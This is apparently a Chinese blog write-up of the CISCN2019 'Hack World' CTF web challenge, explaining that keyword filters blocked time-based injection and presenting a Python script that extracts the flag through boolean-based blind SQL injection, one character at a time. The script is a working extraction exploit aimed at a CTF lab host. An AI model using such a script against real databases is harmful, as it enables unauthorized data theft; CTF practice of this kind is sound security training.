Loading

[CISCN2019 华北赛区 Day2 Web1]Hack World

知识点

基于布尔型盲注
编写python脚本能力

审题


很简洁的一个post提交sql注入题 测试了一下 过滤了一大堆 尝试了基于时间的布尔盲注 被过滤 然后尝试了一下基于布尔型的盲注 成功
然后就是很简单的编写脚本 算是个简单题

这个就是成功回显页面 可以看到和输入id=1回显一样 下面贴出脚本

EXP

import requests
url = 'http://3c029064-6b6f-4efb-b2e0-ebb2495ed95a.node3.buuoj.cn/index.php'
result = ''
num = 0
for i in range (1,60):
    if (num == 1):
        break;
    for j in range (32,128):
        payload = 'if(ascii(substr((select(flag)from(flag)),%d,1))=%d,1,2)'%(i,j)
        print(payload)
        data = {
            'id' : payload,
        }
        r = requests.post(url , data = data)
        if '}' in r.text:
            num = 1
            print(result

                  )
            break
        if 'Hello' in r.text:
            x = chr(j)
            result += str(x)
            print(result)
            break

EOF

posted @ 2020-11-21 22:29  养一只猫  阅读(107)  评论(0编辑  收藏  举报